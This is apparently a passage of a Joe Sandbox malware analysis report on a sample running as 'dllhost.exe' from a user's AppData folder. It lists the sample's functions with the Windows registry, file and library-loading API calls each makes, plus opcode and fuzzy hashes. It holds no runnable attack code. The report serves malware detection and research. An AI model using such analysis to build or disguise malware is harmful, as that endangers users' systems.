                                                                              • MulDiv.KERNEL32 ref: 004013E4
                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                              • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                              • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                              • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                              Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegDeleteValueW.ADVAPI32 ref: 004023AA
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteValue
                                                                              • String ID:
                                                                              • API String ID: 2831762973-0
                                                                              • Opcode ID: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                                                              • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                                                              • Opcode Fuzzy Hash: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                                                              • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                                                              Function 00405383 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 00405393
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004053DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeMessageSendUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2896919175-0
                                                                              • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                              • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
                                                                              • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                              • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
                                                                              Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableShow
                                                                              • String ID:
                                                                              • API String ID: 1136574915-0
                                                                              • Opcode ID: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                                                              • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                                                              • Opcode Fuzzy Hash: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                                                              • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                                                              Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                                                              • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
                                                                              • Opcode Fuzzy Hash: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                                                              • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
                                                                              Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                                • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                                • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                                                                • Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2547128583-0
                                                                              • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                              • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                                                              • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                              • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                                                              Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                              Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                              • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                              • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                                                              Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileMove
                                                                              • String ID:
                                                                              • API String ID: 3562171763-0
                                                                              • Opcode ID: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                                                              • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                                                              • Opcode Fuzzy Hash: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                                                              • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                                                              Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 0040233D
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringWrite
                                                                              • String ID:
                                                                              • API String ID: 390214022-0
                                                                              • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                              • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                              • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                              • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                              Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406110
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                              • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                              • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                                                              Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405DD5
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
